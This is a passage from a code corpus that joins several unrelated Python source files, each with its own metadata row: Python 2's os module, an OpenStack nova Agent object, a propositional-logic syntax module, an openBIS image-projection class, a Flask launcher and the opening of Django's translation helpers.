- os.pardir is a string representing the parent directory ('..' or '::')
- os.sep is the (or a most common) pathname separator ('/' or ':' or '\\')
- os.extsep is the extension separator ('.' or '/')
- os.altsep is the alternate pathname separator (None or '/')
- os.pathsep is the component separator used in $PATH etc
- os.linesep is the line separator in text files ('\r' or '\n' or '\r\n')
- os.defpath is the default search path for executables
- os.devnull is the file path of the null device ('/dev/null', etc.)
Programs that import and use 'os' stand a better chance of being
portable between different platforms. Of course, they must then
only use functions that are defined by all platforms (e.g., unlink
and opendir), and leave all pathname manipulation to os.path
(e.g., split and join).
"""
#'
import sys, errno
_names = sys.builtin_module_names
# Note: more names are added to __all__ later.
__all__ = ["altsep", "curdir", "pardir", "sep", "extsep", "pathsep", "linesep",
"defpath", "name", "path", "devnull",
"SEEK_SET", "SEEK_CUR", "SEEK_END"]
def _get_exports_list(module):
try:
return list(module.__all__)
except AttributeError:
return [n for n in dir(module) if n[0] != '_']
if 'posix' in _names:
name = 'posix'
linesep = '\n'
from posix import *
try:
from posix import _exit
except ImportError:
pass
import posixpath as path
import posix
__all__.extend(_get_exports_list(posix))
del posix
elif 'nt' in _names:
name = 'nt'
linesep = '\r\n'
from nt import *
try:
from nt import _exit
except ImportError:
pass
import ntpath as path
import nt
__all__.extend(_get_exports_list(nt))
del nt
elif 'os2' in _names:
name = 'os2'
linesep = '\r\n'
from os2 import *
try:
from os2 import _exit
except ImportError:
pass
if sys.version.find('EMX GCC') == -1:
import ntpath as path
else:
import os2emxpath as path
from _emx_link import link
import os2
__all__.extend(_get_exports_list(os2))
del os2
elif 'ce' in _names:
name = 'ce'
linesep = '\r\n'
from ce import *
try:
from ce import _exit
except ImportError:
pass
# We can use the standard Windows path.
import ntpath as path
import ce
__all__.extend(_get_exports_list(ce))
del ce
elif 'riscos' in _names:
name = 'riscos'
linesep = '\n'
from riscos import *
try:
from riscos import _exit
except ImportError:
pass
import riscospath as path
import riscos
__all__.extend(_get_exports_list(riscos))
del riscos
else:
raise ImportError, 'no os specific module found'
sys.modules['os.path'] = path
from os.path import (curdir, pardir, sep, pathsep, defpath, extsep, altsep,
devnull)
del _names
# Python uses fixed values for the SEEK_ constants; they are mapped
# to native constants if necessary in posixmodule.c
SEEK_SET = 0
SEEK_CUR = 1
SEEK_END = 2
#'
# Super directory utilities.
# (Inspired by Eric Raymond; the doc strings are mostly his)
def makedirs(name, mode=0777):
"""makedirs(path [, mode=0777])
Super-mkdir; create a leaf directory and all intermediate ones.
Works like mkdir, except that any intermediate path segment (not
just the rightmost) will be created if it does not exist. This is
recursive.
"""
head, tail = path.split(name)
if not tail:
head, tail = path.split(head)
if head and tail and not path.exists(head):
try:
makedirs(head, mode)
except OSError, e:
# be happy if someone already created the path
if e.errno != errno.EEXIST:
raise
if tail == curdir: # xxx/newdir/. exists if xxx/newdir exists
return
mkdir(name, mode)
def removedirs(name):
"""removedirs(path)
Super-rmdir; remove a leaf directory and all empty intermediate
ones. Works like rmdir except that, if the leaf directory is
successfully removed, directories corresponding to rightmost path
segments will be pruned away until either the whole path is
consumed or an error occurs. Errors during this latter phase are
ignored -- they generally mean that a directory was not empty.
"""
rmdir(name)
head, tail = path.split(name)
if not tail:
head, tail = path.split(head)
while head and tail:
try:
rmdir(head)
except error:
break
head, tail = path.split(head)
def renames(old, new):
"""renames(old, new)
Super-rename; create directories as necessary and delete any left
empty. Works like rename, except creation of any intermediate
directories needed to make the new pathname good is attempted
first. After the rename, directories corresponding to rightmost
    path segments of the old name will be pruned away until either the
whole path is consumed or a nonempty directory is found.
Note: this function can fail with the new directory structure made
if you lack permissions needed to unlink the leaf directory or
file.
"""
head, tail = path.split(new)
if head and tail and not path.exists(head):
makedirs(head)
rename(old, new)
head, tail = path.split(old)
if head and tail:
try:
removedirs(head)
except error:
pass
__all__.extend(["makedirs", "removedirs", "renames"])
def walk(top, topdown=True, onerror=None, followlinks=False):
"""Directory tree generator.
For each directory in the directory tree rooted at top (including top
itself, but excluding '.' and '..'), yields a 3-tuple
dirpath, dirnames, filenames
dirpath is a string, the path to the directory. dirnames is a list of
the names of the subdirectories in dirpath (excluding '.' and '..').
filenames is a list of the names of the non-directory files in dirpath.
Note that the names in the lists are just names, with no path components.
To get a full path (which begins with top) to a file or directory in
dirpath, do os.path.join(dirpath, name).
If optional arg 'topdown' is true or not specified, the triple for a
directory is generated before the triples for any of its subdirectories
(directories are generated top down). If topdown is false, the triple
for a directory is generated after the triples for all of its
subdirectories (directories are generated bottom up).
When topdown is true, the caller can modify the dirnames list in-place
(e.g., via del or slice assignment), and walk will only recurse into the
subdirectories whose names remain in dirnames; this can be used to prune
the search, or to impose a specific order of visiting. Modifying
dirnames when topdown is false is ineffective, since the directories in
dirnames have already been generated by the time dirnames itself is
generated.
By default errors from the os.listdir() call are ignored. If
optional arg 'onerror' is specified, it should be a function; it
will be called with one argument, an os.error instance. It can
report the error to continue with the walk, or raise the exception
to abort the walk. Note that the filename is available as the
filename attribute of the exception object.
By default, os.walk does not follow symbolic links to subdirectories on
systems that support them. In order to get this functionality, set the
optional argument 'followlinks' to true.
Caution: if you pass a relative pathname for top, don't change the
current working directory between resumptions of walk. walk never
changes the current directory, and assumes that the client doesn't
either.
Example:
import os
from os.path import join, getsize
for root, dirs, files in os.walk('python/Lib/email'):
print root, "consumes",
print sum([getsize(join(root, name)) for name in files]),
print "bytes in", len(files), "non-directory files"
if 'CVS' in dirs:
dirs.remove('CVS') # don't visit CVS directories
"""
from os.path import join, isdir, islink
# We may not have read permission for top, in which case we can't
# get a list of the files the directory contains. os.path.walk
# always suppressed the exception then, rather than blow up for a
# minor reason when (say) a thousand readable directories are still
# left to visit. That logic is copied here.
try:
# Note that listdir and error are globals in this module due
# to earlier import-*.
names = listdir(top)
except error, err:
if onerror is not None:
onerror(err)
return
dirs, nondirs = [], []
for name in names:
if isdir(join(top, name)):
dirs.append(name)
else:
nondirs.append(name)
if topdown:
yield top, dirs, nondirs
for name in dirs:
path = join(top, name)
if followlinks or not islink(path):
for x in walk(path, topdown, onerror, followlinks):
yield x
if not topdown:
yield top, dirs, nondirs
__all__.append("walk")
# Make sure os.environ exists, at least
try:
environ
except NameError:
environ = {}
def execl(file, *args):
"""execl(file, *args)
Execute the executable file with argument list args, replacing the
current process. """
execv(file, args)
def execle(file, *args):
"""execle(file, *args, env)
Execute the executable file with argument list args and
environment env, replacing the current process. """
env = args[-1]
execve(file, args[:-1], env)
def execlp(file, *args):
"""execlp(file, *args)
Execute the executable file (which is searched for along $PATH)
with argument list args, replacing the current process. """
execvp(file, args)
def execlpe(file, *args):
"""execlpe(file, *args, env)
Execute the executable file (which is searched for along $PATH)
with argument list args and environment env, replacing the current
process. """
env = args[-1]
execvpe(file, args[:-1], env)
def execvp(file, args):
"""execp(file, args)
Execute the executable file (which is searched for along $PATH)
with argument list args, replacing the current process.
args may be a list or tuple of strings. """
_execvpe(file, args)
def execvpe(file, args, env):
"""execvpe(file, args, env)
Execute the executable file (which is searched for along $PATH)
with argument list args and environment env , replacing the
current process.
args may be a list or tuple of strings. """
_execvpe(file, args, env)
__all__.extend(["execl","execle","execlp","execlpe","execvp","execvpe"])
def _execvpe(file, args, env=None):
if env is not None:
func = execve
argrest = (args, env)
else:
func = execv
argrest = (args,)
env = environ
head, tail = path.split(file)
if head:
func(file, *argrest)
return
if 'PATH' in env:
envpath = env['PATH']
else:
envpath = defpath
PATH = envpath.split(pathsep)
saved_exc = None
saved_tb = None
for dir in PATH:
fullname = path.join(dir, file)
try:
func(fullname, *argrest)
except error, e:
tb = sys.exc_info()[2]
if (e.errno != errno.ENOENT and e.errno != errno.ENOTDIR
and saved_exc is None):
saved_exc = e
saved_tb = tb
if saved_exc:
raise error, saved_exc, saved_tb
raise error, e, tb
# Change environ to automatically call putenv() if it exists
try:
# This will fail if there's no putenv
putenv
except NameError:
pass
else:
import UserDict
# Fake unsetenv() for Windows
# not sure about os2 here but
# I'm guessing they are the same.
if name in ('os2', 'nt'):
def unsetenv(key):
putenv(key, "")
if name == "riscos":
# On RISC OS, all env access goes through getenv and putenv
from riscosenviron import _Environ
elif name in ('os2', 'nt'): # Where Env Var Names Must Be UPPERCASE
# But we store them as upper case
class _Environ(UserDict.IterableUserDict):
def __init__(self, environ):
UserDict.UserDict.__init__(self)
data = self.data
for k, v in environ.items():
data[k.upper()] = v
def __setitem__(self, key, item):
putenv(key, item)
self.data[key.upper()] = item
def __getitem__(self, key):
return self.data[key.upper()]
try:
unsetenv
except NameError:
def __delitem__(self, key):
del self.data[key.upper()]
else:
def __delitem__(self, key):
unsetenv(key)
del self.data[key.upper()]
def clear(self):
for key in self.data.keys():
unsetenv(key)
del self.data[key]
def pop(self, key, *args):
unsetenv(key)
return self.data.pop(key.upper(), *args)
def has_key(self, key):
return key.upper() in self.data
def __contains__(self, key):
return key.upper() in self.data
def get(self, key, failobj=None):
return self.data.get(key.upper(), failobj)
def update(self, dict=None, **kwargs):
if dict:
try:
keys = dict.keys()
except AttributeError:
# List of (key, value)
for k, v in dict:
self[k] = v
else:
# got keys
# cannot use items(), since mappings
# may not have them.
for k in keys:
self[k] = dict[k]
if kwargs:
self.update(kwargs)
def copy(self):
return dict(self)
else: # Where Env Var Names Can Be Mixed Case
class _Environ(UserDict.IterableUserDict):
def __init__(self, environ):
UserDict.UserDict.__init__(self)
self.data = environ
def __setitem__(self, key, item):
putenv(key, item)
self.data[key] = item
def update(self, dict=None, **kwargs):
if dict:
try:
keys = dict.keys()
except AttributeError:
# List of (key, value)
for k, v in dict:
self[k] = v
else:
# got keys
# cannot use items(), since mappings
# may not have them.
for k in keys:
self[k] = dict[k]
if kwargs:
self.update(kwargs)
try:
unsetenv
except NameError:
pass
else:
def __delitem__(self, key):
unsetenv(key)
del self.data[key]
def clear(self):
for key in self.data.keys():
unsetenv(key)
del self.data[key]
def pop(self, key, *args):
unsetenv(key)
return self.data.pop(key, *args)
def copy(self):
return dict(self)
environ = _Environ(environ)
def getenv(key, default=None):
"""Get an environment variable, return None if it doesn't exist.
The optional second argument can specify an alternate default."""
return environ.get(key, default)
__all__.append("getenv")
def _exists(name):
try:
eval(name)
return True
except NameError:
return False
# Supply spawn*() (probably only for Unix)
if _exists("fork") and not _exists("spawnv") and _exists("execv"):
P_WAIT = 0
P_NOWAIT = P_NOWAITO = 1
# XXX Should we support P_DETACH? I suppose it could fork()**2
# and close the std I/O streams. Also, P_OVERLAY is the same
# as execv*()?
def _spawnvef(mode, file, args, env, func):
# Internal helper; func is the exec*() function to use
pid = fork()
if not pid:
# Child
try:
if env is None:
func(file, args)
else:
func(file, args, env)
except:
_exit(127)
else:
# Parent
if mode == P_NOWAIT:
return pid # Caller is responsible for waiting!
while 1:
wpid, sts = waitpid(pid, 0)
if WIFSTOPPED(sts):
continue
elif WIFSIGNALED(sts):
return -WTERMSIG(sts)
elif WIFEXITED(sts):
return WEXITSTATUS(sts)
else:
raise error, "Not stopped, signaled or exited???"
def spawnv(mode, file, args):
"""spawnv(mode, file, args) -> integer
Execute file with arguments from args in a subprocess.
If mode == P_NOWAIT return the pid of the process.
If mode == P_WAIT return the process's exit code if it exits normally;
otherwise return -SIG, where SIG is the signal that killed it. """
return _spawnvef(mode, file, args, None, execv)
def spawnve(mode, file, args, env):
"""spawnve(mode, file, args, env) -> integer
Execute file with arguments from args in a subprocess with the
specified environment.
If mode == P_NOWAIT return the pid of the process.
If mode == P_WAIT return the process's exit code if it exits normally;
otherwise return -SIG, where SIG is the signal that killed it. """
return _spawnvef(mode, file, args, env, execve)
    # Note: spawnvp[e] isn't currently supported on Windows
def spawnvp(mode, file, args):
"""spawnvp(mode, file, args) -> integer
Execute file (which is looked for along $PATH) with arguments from
args in a subprocess.
If mode == P_NOWAIT return the pid of the process.
If mode == P_WAIT return the process's exit code if it exits normally;
otherwise return -SIG, where SIG is the signal that killed it. """
return _spawnvef(mode, file, args, None, execvp)
def spawnvpe(mode, file, args, env):
"""spawnvpe(mode, file, args, env) -> integer
Execute file (which is looked for along $PATH) with arguments from
args in a subprocess with the supplied environment.
If mode == P_NOWAIT return the pid of the process.
If mode == P_WAIT return the process's exit code if it exits normally;
otherwise return -SIG, where SIG is the signal that killed it. """
return _spawnvef(mode, file, args, env, execvpe)
if _exists("spawnv"):
# These aren't supplied by the basic Windows code
# but can be easily implemented in Python
def spawnl(mode, file, *args):
"""spawnl(mode, file, *args) -> integer
Execute file with arguments from args in a subprocess.
If mode == P_NOWAIT return the pid of the process.
If mode == P_WAIT return the process's exit code if it exits normally;
otherwise return -SIG, where SIG is the signal that killed it. """
return spawnv(mode, file, args)
def spawnle(mode, file, *args):
"""spawnle(mode, file, *args, env) -> integer
Execute file with arguments from args in a subprocess with the
supplied environment.
If mode == P_NOWAIT return the pid of the process.
If mode == P_WAIT return the process's exit code if it exits normally;
otherwise return -SIG, where SIG is the signal that killed it. """
env = args[-1]
return spawnve(mode, file, args[:-1], env)
__all__.extend(["spawnv", "spawnve", "spawnl", "spawnle",])
if _exists("spawnvp"):
# At the moment, Windows doesn't implement spawnvp[e],
# so it won't have spawnlp[e] either.
def spawnlp(mode, file, *args):
"""spawnlp(mode, file, *args) -> integer
Execute file (which is looked for along $PATH) with arguments from
        args in a subprocess.
If mode == P_NOWAIT return the pid of the process.
If mode == P_WAIT return the process's exit code if it exits normally;
otherwise return -SIG, where SIG is the signal that killed it. """
return spawnvp(mode, file, args)
def spawnlpe(mode, file, *args):
"""spawnlpe(mode, file, *args, env) -> integer
Execute file (which is looked for along $PATH) with arguments from
args in a subprocess with the supplied environment.
If mode == P_NOWAIT return the pid of the process.
If mode == P_WAIT return the process's exit code if it exits normally;
otherwise return -SIG, where SIG is the signal that killed it. """
env = args[-1]
return spawnvpe(mode, file, args[:-1], env)
__all__.extend(["spawnvp", "spawnvpe", "spawnlp", "spawnlpe",])
# Supply popen2 etc. (for Unix)
if _exists("fork"):
if not _exists("popen2"):
def popen2(cmd, mode="t", bufsize=-1):
"""Execute the shell command 'cmd' in a sub-process. On UNIX, 'cmd'
may be a sequence, in which case arguments will be passed directly to
the program without shell intervention (as with os.spawnv()). If 'cmd'
is a string it will be passed to the shell (as with os.system()). If
'bufsize' is specified, it sets the buffer size for the I/O pipes. The
file objects (child_stdin, child_stdout) are returned."""
import warnings
msg = "os.popen2 is deprecated. Use the subprocess module."
warnings.warn(msg, DeprecationWarning, stacklevel=2)
import subprocess
PIPE = subprocess.PIPE
p = subprocess.Popen(cmd, shell=isinstance(cmd, basestring),
bufsize=bufsize, stdin=PIPE, stdout=PIPE,
close_fds=True)
return p.stdin, p.stdout
__all__.append("popen2")
if not _exists("popen3"):
def popen3(cmd, mode="t", bufsize=-1):
"""Execute the shell command 'cmd' in a sub-process. On UNIX, 'cmd'
may be a sequence, in which case arguments will be passed directly to
the program without shell intervention (as with os.spawnv()). If 'cmd'
is a string it will be passed to the shell (as with os.system()). If
'bufsize' is specified, it sets the buffer size for the I/O pipes. The
file objects (child_stdin, child_stdout, child_stderr) are returned."""
import warnings
msg = "os.popen3 is deprecated. Use the subprocess module."
warnings.warn(msg, DeprecationWarning, stacklevel=2)
import subprocess
PIPE = subprocess.PIPE
p = subprocess.Popen(cmd, shell=isinstance(cmd, basestring),
bufsize=bufsize, stdin=PIPE, stdout=PIPE,
stderr=PIPE, close_fds=True)
return p.stdin, p.stdout, p.stderr
__all__.append("popen3")
if not _exists("popen4"):
def popen4(cmd, mode="t", bufsize=-1):
"""Execute the shell command 'cmd' in a sub-process. On UNIX, 'cmd'
may be a sequence, in which case arguments will be passed directly to
the program without shell intervention (as with os.spawnv()). If 'cmd'
is a string it will be passed to the shell (as with os.system()). If
'bufsize' is specified, it sets the buffer size for the I/O pipes. The
file objects (child_stdin, child_stdout_stderr) are returned."""
import warnings
msg = "os.popen4 is deprecated. Use the subprocess module."
warnings.warn(msg, DeprecationWarning, stacklevel=2)
import subprocess
PIPE = subprocess.PIPE
p = subprocess.Popen(cmd, shell=isinstance(cmd, basestring),
bufsize=bufsize, stdin=PIPE, stdout=PIPE,
stderr=subprocess.STDOUT, close_fds=True)
return p.stdin, p.stdout
__all__.append("popen4")
import copy_reg as _copy_reg
def _make_stat_result(tup, dict):
return stat_result(tup, dict)
def _pickle_stat_result(sr):
(type, args) = sr.__reduce__()
return (_make_stat_result, args)
try:
_copy_reg.pickle(stat_result, _pickle_stat_result, _make_stat_result)
except NameError: # stat_result may not exist
pass
def _make_statvfs_result(tup, dict):
return statvfs_result(tup, dict)
def _pickle_statvfs_result(sr):
(type, args) = sr.__reduce__()
return (_make_statvfs_result, args)
try:
_copy_reg.pickle(statvfs_result, _pickle_statvfs_result,
_make_statvfs_result)
except NameError: # statvfs_result may not exist
pass
if not _exists("urandom"):
def urandom(n):
"""urandom(n) -> str
Return a string of n random bytes suitable for cryptographic use.
"""
try:
_urandomfd = open("/dev/urandom", O_RDONLY)
except (OSError, IOError):
raise NotImplementedError("/dev/urandom (or equivalent) not found")
try:
bs = b""
while n - len(bs) >= 1:
bs += read(_urandomfd, n - len(bs))
finally:
close(_urandomfd)
return bs
| MicroTrustRepos/microkernel | src/l4/pkg/python/contrib/Lib/os.py | Python | gpl-2.0 | 26,337 | 0.003038 |
# Copyright 2014 Red Hat, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova import db
from nova import exception
from nova import objects
from nova.objects import base
from nova.objects import fields
class Agent(base.NovaPersistentObject, base.NovaObject):
VERSION = '1.0'
fields = {
'id': fields.IntegerField(read_only=True),
'hypervisor': fields.StringField(),
'os': fields.StringField(),
'architecture': fields.StringField(),
'version': fields.StringField(),
'url': fields.StringField(),
'md5hash': fields.StringField(),
}
@staticmethod
def _from_db_object(context, agent, db_agent):
for name in agent.fields:
agent[name] = db_agent[name]
agent._context = context
agent.obj_reset_changes()
return agent
@base.remotable_classmethod
def get_by_triple(cls, context, hypervisor, os, architecture):
db_agent = db.agent_build_get_by_triple(context, hypervisor,
os, architecture)
if not db_agent:
return None
return cls._from_db_object(context, objects.Agent(), db_agent)
@base.remotable
def create(self, context):
updates = self.obj_get_changes()
if 'id' in updates:
raise exception.ObjectActionError(action='create',
reason='Already Created')
db_agent = db.agent_build_create(context, updates)
self._from_db_object(context, self, db_agent)
@base.remotable
def destroy(self, context):
db.agent_build_destroy(context, self.id)
@base.remotable
def save(self, context):
updates = self.obj_get_changes()
db.agent_build_update(context, self.id, updates)
self.obj_reset_changes()
class AgentList(base.ObjectListBase, base.NovaObject):
VERSION = '1.0'
fields = {
'objects': fields.ListOfObjectsField('Agent'),
}
child_versions = {
'1.0': '1.0',
}
@base.remotable_classmethod
def get_all(cls, context, hypervisor=None):
db_agents = db.agent_build_get_all(context, hypervisor=hypervisor)
return base.obj_make_list(context, cls(), objects.Agent, db_agents)
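# --- Illustrative sketch (not part of the original module) ---
# A hedged example of how the Agent object above is typically used. It is a
# sketch only: it assumes a valid nova RequestContext and a reachable
# database, and every field value below is made up for illustration.
def _agent_example(context):
    agent = Agent()
    agent.hypervisor = 'xen'
    agent.os = 'linux'
    agent.architecture = 'x86_64'
    agent.version = '1.0'
    agent.url = 'http://example.com/agent.tgz'
    agent.md5hash = 'd41d8cd98f00b204e9800998ecf8427e'
    agent.create(context)
    # The freshly created row can be looked up again by its triple.
    return Agent.get_by_triple(context, 'xen', 'linux', 'x86_64')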
| ChinaMassClouds/copenstack-server | openstack/src/nova-2014.2/nova/objects/agent.py | Python | gpl-2.0 | 2,828 | 0 |
"""Describe the language syntax."""
import re
class Symbol:
"""Describes the language symbols."""
# General pattern of formulas
pattern = '([a-z0-9&\-\|><\(\)]*)'
accepted_chars = '([a-z0-9&\-\|><\(\)]*)'
def __init__(self, value):
"""Init a propositional symbol."""
self.value = value
@classmethod
def check(cls, symbol):
"""Check if the given arg is a symbol."""
regexp = re.compile(r'^%s$' % cls.pattern)
return regexp.match(symbol)
@classmethod
def accepts_initial_char(cls, char):
"""Check if the operator accepts the given char as initial char."""
regexp = re.compile(r'^%s$' % cls.accepted_initial_char)
return regexp.match(char)
def is_a(self, cls):
"""Check if this token is a given type."""
return isinstance(self, cls)
def __str__(self):
"""Return the symbol value as str."""
return self.value
class PropositionalSymbol(Symbol):
"""
Describes the propositional symbols of the language.
The propositional symbols are represented by any
    lowercase letter, optionally followed by an integer index.
Examples:
p, p1, q23, r1890
"""
accepted_initial_char = '[a-z]'
pattern = '([a-z]{1}[0-9]*)'
def subformulas(self):
"""
Get the formula subformulas.
Return itself as it is a propositional symbol.
"""
return [self]
def str_representation(self):
"""String representation of the symbol."""
return self.value
def evaluate(self, symbol_values):
"""Evaluate symbol with given values."""
return symbol_values[self.str_representation()]
def count_terms(self):
"""Count the terms of the formula."""
return 1
class PontuationSymbol(Symbol):
"""
Describes the pontuation symbols of the language.
The pontuation symbols are represented by the
opening and closing parenthesis.
"""
pattern = '([\(\)])'
class OpeningParenthesis(PontuationSymbol):
"""Describes the opening parenthesis."""
accepted_initial_char = '\('
pattern = '\('
class ClosingParenthesis(PontuationSymbol):
"""Describes the closing parenthesis."""
accepted_initial_char = '\)'
pattern = '\)'
class Operator(Symbol):
"""Base class for language operators."""
class Associativity:
"""Possible operators associativity."""
LEFT = 1
RIGHT = 0
def subformulas(self):
"""Get the formula subformulas."""
raise NotImplementedError
def evaluate(self, symbol_values):
"""Evaluate an operator with given values."""
raise NotImplementedError
def __str__(self):
"""Return the string representation as str."""
return self.str_representation()
class BinaryOperator(Operator):
"""Describe binary operators."""
def set_args(self, arg1, arg2):
"""Set the operator args."""
self.arg1 = arg1
self.arg2 = arg2
def subformulas(self):
"""
Get the formula subformulas.
Return itself and the subformulas of its first and second args.
"""
return self.arg1.subformulas() + self.arg2.subformulas() + [self]
def str_representation(self):
"""String representation of the formula."""
if self.arg1.is_a(PropositionalSymbol) or (
self.arg1.is_a(Operator) and
self.precendence <= self.arg1.precendence
):
# In this case do not need parenthesis
arg1_repr = self.arg1.str_representation()
else:
arg1_repr = '(' + self.arg1.str_representation() + ')'
if self.arg2.is_a(PropositionalSymbol) or (
self.arg2.is_a(Operator) and
self.precendence <= self.arg2.precendence
):
arg2_repr = self.arg2.str_representation()
else:
arg2_repr = '(' + self.arg2.str_representation() + ')'
return arg1_repr + self.SYMBOL + arg2_repr
def count_terms(self):
"""Count the terms of the formula."""
return 1 + self.arg1.count_terms() + self.arg2.count_terms()
class UnaryOperator(Operator):
"""Describe unary operators."""
def set_arg(self, arg):
"""Set the operator arg."""
self.arg1 = arg
def subformulas(self):
"""
Get the formula subformulas.
Return itself and the subformulas of its arg.
"""
return self.arg1.subformulas() + [self]
def str_representation(self):
"""String representation of the formula."""
if self.arg1.is_a(PropositionalSymbol):
return self.SYMBOL + self.arg1.str_representation()
else:
return self.SYMBOL + '(' + self.arg1.str_representation() + ')'
def count_terms(self):
"""Count the terms of the formula."""
return 1 + self.arg1.count_terms()
class Negation(UnaryOperator):
"""Describe the negation operator."""
SYMBOL = '-'
accepted_initial_char = '\-'
pattern = '\-'
precendence = 6
associativity = Operator.Associativity.RIGHT
def evaluate(self, symbol_values):
"""Evaluate a negation with given values."""
return not self.arg1.evaluate(symbol_values)
class Conjunction(BinaryOperator):
"""Describe the conjunction operator."""
SYMBOL = '&'
accepted_initial_char = '&'
pattern = '&'
precendence = 5
associativity = Operator.Associativity.LEFT
def evaluate(self, symbol_values):
"""Evaluate a conjunction with given values."""
return (self.arg1.evaluate(symbol_values) and
self.arg2.evaluate(symbol_values))
class Disjunction(BinaryOperator):
"""Describe the disjunction operator."""
SYMBOL = '|'
accepted_initial_char = '\|'
pattern = '\|'
precendence = 4
associativity = Operator.Associativity.LEFT
def evaluate(self, symbol_values):
"""Evaluate a disjunction with given values."""
return (self.arg1.evaluate(symbol_values) or
self.arg2.evaluate(symbol_values))
class Implication(BinaryOperator):
"""Describe the implication operator."""
SYMBOL = '->'
accepted_initial_char = '\-'
pattern = '\->'
precendence = 3
associativity = Operator.Associativity.LEFT
def evaluate(self, symbol_values):
"""
Evaluate an implication with given values.
        Uses the equivalence: p -> q = -p | q
"""
return (not self.arg1.evaluate(symbol_values) or
self.arg2.evaluate(symbol_values))
class BiImplication(BinaryOperator):
"""Describe the bi-implication operator."""
SYMBOL = '<->'
accepted_initial_char = '<'
pattern = '<\->'
precendence = 2
associativity = Operator.Associativity.LEFT
def evaluate(self, symbol_values):
"""
Evaluate a bi-implication with given values.
        Uses the equivalence: p <-> q = (p -> q) & (q -> p) = (-p | q) & (-q | p)
"""
return (
not self.arg1.evaluate(symbol_values) or
self.arg2.evaluate(symbol_values)
) and (
not self.arg2.evaluate(symbol_values) or
self.arg1.evaluate(symbol_values)
)
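# --- Illustrative sketch (not part of the original module) ---
# A hedged example of composing and evaluating the operator classes above
# without a parser: it builds p -> q by hand and evaluates it under one
# truth assignment. The symbol names are purely illustrative.
def _implication_example():
    p = PropositionalSymbol('p')
    q = PropositionalSymbol('q')
    imp = Implication(Implication.SYMBOL)
    imp.set_args(p, q)
    # str_representation() gives 'p->q'; an implication is False only when
    # its antecedent is True and its consequent is False.
    return imp.evaluate({'p': True, 'q': False})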
| italopaiva/propositional-logic | lp/syntax.py | Python | mit | 7,307 | 0.002874 |
# -*- coding: utf-8 -*-
'''
Created on Apr 27, 2016
@author: Aaron Ponti
'''
from ch.systemsx.cisd.openbis.dss.etl.dto.api.impl import MaximumIntensityProjectionGenerationAlgorithm
class GenericTIFFSeriesMaximumIntensityProjectionGenerationAlgorithm(MaximumIntensityProjectionGenerationAlgorithm):
'''
Custom MaximumIntensityProjectionGenerationAlgorithm for Generic TIFF Series
that makes sure that the first timepoint in a series is registered for
creation of the representative thumbnail.
'''
def __init__(self, datasetTypeCode, width, height, filename):
"""
Constructor
"""
# Call the parent base constructor
MaximumIntensityProjectionGenerationAlgorithm.__init__(self,
datasetTypeCode, width, height, filename)
def imageToBeIgnored(self, image):
"""
Overrides the parent imageToBeIgnored method. The selection of which
series should be used to create the representative thumbnail is done
in GenericTIFFSeriesCompositeDatasetConfig. Here we prevent the base
MaximumIntensityProjectionGenerationAlgorithm.imageToBeIgnored() method
to make a decision based on the timepoint (== 0), since we cannot know
which is the first time point in a Generic TIFF Series.
"""
return False
| aarpon/obit_microscopy_core_technology | core-plugins/microscopy/3/dss/drop-boxes/MicroscopyDropbox/GenericTIFFSeriesMaximumIntensityProjectionGenerationAlgorithm.py | Python | apache-2.0 | 1,343 | 0.005957 |
'''
Created on 17/2/2015
@author: PC06
First change in the project
'''
from include import app
if __name__ == '__main__':
app.run("127.0.0.1", 9000, debug=True)
| javiteri/reposdmpdos | miltonvz/run.py | Python | gpl-2.0 | 176 | 0.005682 |
"""Translation helper functions."""
import locale
import os
import re
import sys
import gettext as gettext_module
from cStringIO import StringIO
from django.utils.importlib import import_module
from django.utils.safestring import mark_safe, SafeData
from django.utils.thread_support import currentThread
# Translations are cached in a dictionary for every language+app tuple.
# The active translations are stored by threadid to make them thread local.
_translations = {}
_active = {}
# The default translation is based on the settings file.
_default = None
# This is a cache for normalized accept-header languages to prevent multiple
# file lookups when checking the same locale on repeated requests.
_accepted = {}
# Format of Accept-Language header values. From RFC 2616, section 14.4 and 3.9.
accept_language_re = re.compile(r'''
([A-Za-z]{1,8}(?:-[A-Za-z]{1,8})*|\*) # "en", "en-au", "x-y-z", "*"
    (?:;q=(0(?:\.\d{,3})?|1(?:\.0{,3})?))? # Optional "q=1.00", "q=0.8"
(?:\s*,\s*|$) # Multiple accepts per header.
''', re.VERBOSE)
def to_locale(language, to_lower=False):
"""
Turns a language name (en-us) into a locale name (en_US). If 'to_lower' is
True, the last component is lower-cased (en_us).
"""
p = language.find('-')
if p >= 0:
if to_lower:
return language[:p].lower()+'_'+language[p+1:].lower()
else:
return language[:p].lower()+'_'+language[p+1:].upper()
else:
return language.lower()
def to_language(locale):
"""Turns a locale name (en_US) into a language name (en-us)."""
p = locale.find('_')
if p >= 0:
return locale[:p].lower()+'-'+locale[p+1:].lower()
else:
return locale.lower()
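# --- Illustrative sketch (not part of the original module) ---
# A hedged example of the two helpers above: they convert between language
# names (dash-separated, lower case) and locale names (underscore, upper-cased
# country part), and are inverses of each other for simple codes.
def _locale_name_example():
    assert to_locale('en-us') == 'en_US'
    assert to_locale('en-us', to_lower=True) == 'en_us'
    assert to_language('en_US') == 'en-us'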
class DjangoTranslation(gettext_module.GNUTranslations):
"""
This class sets up the GNUTranslations context with regard to output
charset. Django uses a defined DEFAULT_CHARSET as the output charset on
Python 2.4. With Python 2.3, use DjangoTranslation23.
"""
def __init__(self, *args, **kw):
from django.conf import settings
gettext_module.GNUTranslations.__init__(self, *args, **kw)
# Starting with Python 2.4, there's a function to define
# the output charset. Before 2.4, the output charset is
# identical with the translation file charset.
try:
self.set_output_charset('utf-8')
except AttributeError:
pass
self.django_output_charset = 'utf-8'
self.__language = '??'
def merge(self, other):
self._catalog.update(other._catalog)
def set_language(self, language):
self.__language = language
def language(self):
return self.__language
def __repr__(self):
return "<DjangoTranslation lang:%s>" % self.__language
class DjangoTranslation23(DjangoTranslation):
"""
Compatibility class that is only used with Python 2.3.
Python 2.3 doesn't support set_output_charset on translation objects and
needs this wrapper class to make sure input charsets from translation files
are correctly translated to output charsets.
With a full switch to Python 2.4, this can be removed from the source.
"""
def gettext(self, msgid):
res = self.ugettext(msgid)
return res.encode(self.django_output_charset)
def ngettext(self, msgid1, msgid2, n):
res = self.ungettext(msgid1, msgid2, n)
